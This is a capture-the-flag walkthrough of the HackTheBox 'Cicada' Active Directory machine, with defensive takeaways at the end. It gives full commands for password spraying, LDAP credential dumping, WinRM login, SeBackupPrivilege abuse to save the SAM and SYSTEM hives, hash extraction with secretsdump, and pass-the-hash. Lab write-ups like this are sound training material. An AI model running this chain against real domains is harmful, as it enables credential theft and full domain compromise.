Overview

Field Detail
Name Cicada
OS Windows Server (Active Directory)
Difficulty Easy
Platform HackTheBox
Topics AD Enumeration, SeBackupPrivilege, Password Spraying

Reconnaissance

Service Scan

An Nmap full-port scan reveals a standard Windows Active Directory domain controller. Nothing unusual stands out beyond the expected AD service stack.

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
                             (Domain: cicada.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: DNS:CICADA-DC.cicada.htb
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP
                             (Domain: cicada.htb, Site: Default-First-Site-Name)

Note: Add the following entries to /etc/hosts before proceeding:

<TARGET_IP>  cicada.htb  CICADA-DC.cicada.htb  CICADA-DC

Enumeration

SMB — Guest Session

Null authentication fails, but a guest login succeeds and exposes a share named HR. Inside this share, an HR notice document contains a default password intended for new employees.

RID Brute-Force — User Enumeration

Using the guest account, brute-force the RID range to enumerate all domain users:

nxc smb <TARGET_IP> -u guest -p '' --rid-brute

Parse the output to extract a clean user list and save it as users.list.

Password Spraying

Spray the default password found in the HR notice against the enumerated user list:

nxc smb <TARGET_IP> -u users.list -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

One account authenticates successfully with the default credentials. However, this account has minimal privileges on its own.

LDAP Dump — Credential Discovery

Using the compromised account, perform a full LDAP dump with ldapdomaindump:

ldapdomaindump ldap://<TARGET_IP> \
  -u 'michael.wrightson' \
  -p 'Cicada$M6Corpb*@Lp#nZp!8' \
  -o lootme

Reviewing the dumped domain objects reveals that david.orelious has stored his password in plaintext within his AD account description field — a common misconfiguration.

SMB Share Enumeration — DEV

Authenticating as david.orelious, the DEV share becomes accessible. It contains a PowerShell backup script:

DEV\Backup_script.ps1

Inspecting the script reveals hardcoded credentials for emily.oscars, who has WinRM access to the domain controller.

Foothold

Authenticate to the DC via WinRM using Emily’s credentials:

evil-winrm -i <TARGET_IP> -u emily.oscars -p '<PASSWORD>'

Privilege Escalation

SeBackupPrivilege Abuse

Checking Emily’s token privileges reveals SeBackupPrivilege is enabled — a powerful privilege that grants the ability to read any file on the system, bypassing ACL enforcement (intended for backup operations).

whoami /priv

Extracting Registry Hives

Use reg save to back up the SAM, SYSTEM, and SECURITY hives:

reg save hklm\sam      C:\Temp\sam.save
reg save hklm\system   C:\Temp\system.save
reg save hklm\security C:\Temp\security.save

Transfer the saved hive files to your attacking machine.

Dumping Hashes

Use Impacket’s secretsdump.py to extract NTLM hashes from the hive files offline:

secretsdump.py -sam sam.save -system system.save local

Output:

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

The Administrator NTLM hash is recovered. Pass-the-hash to authenticate as Administrator and complete the domain compromise.

Attack Chain Summary

flowchart TD A([🔍 Nmap Scan]) --> B[SMB Guest Login] B --> C[HR Share] C --> D[Default Password Discovered] D --> E[RID Brute-Force] E --> F[User List] F & D --> G[Password Spraying] G --> H[michael.wrightson ✓] H --> I[LDAP Dump via ldapdomaindump] I --> J[david.orelious\nPassword in Description] J --> K[DEV Share Access] K --> L[Backup_script.ps1] L --> M[emily.oscars Credentials] M --> N[WinRM Foothold] N --> O{SeBackupPrivilege} O --> P[reg save SAM + SYSTEM] P --> Q[secretsdump.py offline] Q --> R([💀 Administrator Hash])

Key Takeaways

  • Default credentials distributed via internal shares are a critical risk — they should be rotated immediately upon first login.
  • Passwords in AD description fields are a well-known but still common misconfiguration. Audit regularly with Get-ADUser -Filter * -Properties Description.
  • SeBackupPrivilege is effectively equivalent to local administrator; it should never be granted to non-administrative accounts.
  • Hardcoded credentials in scripts present a significant lateral movement risk, even when stored on internal network shares.